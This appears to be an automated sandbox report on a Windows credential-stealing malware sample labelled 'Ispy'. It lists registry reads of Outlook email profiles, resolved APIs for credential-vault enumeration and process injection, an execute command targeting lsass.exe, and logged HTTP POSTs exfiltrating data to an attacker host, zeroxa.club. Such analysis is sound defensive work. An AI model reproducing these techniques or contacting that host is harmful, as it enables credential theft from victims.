HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\E115DF6A HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX D448845E628773E4A9A809DA
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware kernel32.dll.QueryActCtxW ole32.dll.CoGetContextToken kernel32.dll.GetFullPathNameW kernel32.dll.GetVersionExW advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit uxtheme.dll.IsAppThemed kernel32.dll.CreateActCtxA ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.RegisterWindowMessageW kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW advapi32.dll.CryptAcquireContextW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGetProvParam kernel32.dll.lstrlen kernel32.dll.lstrlenW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash advapi32.dll.CryptContextAddRef cryptsp.dll.CryptImportKey cryptsp.dll.CryptContextAddRef advapi32.dll.CryptDuplicateKey cryptsp.dll.CryptDuplicateKey advapi32.dll.CryptSetKeyParam cryptsp.dll.CryptSetKeyParam advapi32.dll.CryptDecrypt cryptsp.dll.CryptDecrypt cryptsp.dll.CryptDestroyKey cryptsp.dll.CryptReleaseContext kernel32.dll.DeleteFileW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.FindAtomW kernel32.dll.AddAtomW mscoree.dll.LoadLibraryShim gdiplus.dll.GdiplusStartup user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipLoadImageFromStream windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock gdiplus.dll.GdipImageForceValidation gdiplus.dll.GdipGetImageType gdiplus.dll.GdipGetImageRawFormat kernel32.dll.SwitchToThread gdiplus.dll.GdipGetImageWidth gdiplus.dll.GdipGetImageHeight gdiplus.dll.GdipGetImageEncodersSize kernel32.dll.LocalAlloc gdiplus.dll.GdipGetImageEncoders kernel32.dll.RtlMoveMemory kernel32.dll.LocalFree gdiplus.dll.GdipSaveImageToStream gdiplus.dll.GdipCreateBitmapFromStream gdiplus.dll.GdipBitmapLockBits gdiplus.dll.GdipBitmapUnlockBits gdiplus.dll.GdipDisposeImage cryptsp.dll.CryptEncrypt kernel32.dll.GlobalMemoryStatusEx shell32.dll.SHGetSpecialFolderPathW kernel32.dll.GetProcAddress kernel32.dll.CreateProcessW ntdll.dll.NtAlertResumeThread ntdll.dll.NtGetContextThread ntdll.dll.NtSetContextThread ntdll.dll.NtUnmapViewOfSection ntdll.dll.NtWriteVirtualMemory kernel32.dll.ReadProcessMemory kernel32.dll.VirtualAllocEx kernel32.dll.CreateFileW kernel32.dll.GetFileType ole32.dll.CoWaitForMultipleHandles kernel32.dll.DeleteAtom sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault netapi32.dll.NetUserGetInfo
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\documents.exe" C:\Windows\system32\lsass.exe
Started Services
VaultSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-08-31 05:29:55 | 2018-08-31 05:32:55 | 180 |
2 HTTP Request(s) detected
http://zeroxa.club/mem/fre.php
- Hostname: zeroxa.club
- IP Address:
- Port: 80
- Count: 2
POST /mem/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: zeroxa.club Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BF8961C8 Content-Length: 192 Connection: close
http://zeroxa.club/mem/fre.php
- Hostname: zeroxa.club
- IP Address:
- Port: 80
- Count: 3
POST /mem/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: zeroxa.club Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BF8961C8 Content-Length: 165 Connection: close
Detected family: #Ispy
TheSystem Itself @ 2018-08-31 05:46:04
#infosec #automation
TheSystem Itself @ 2018-08-31 05:36:11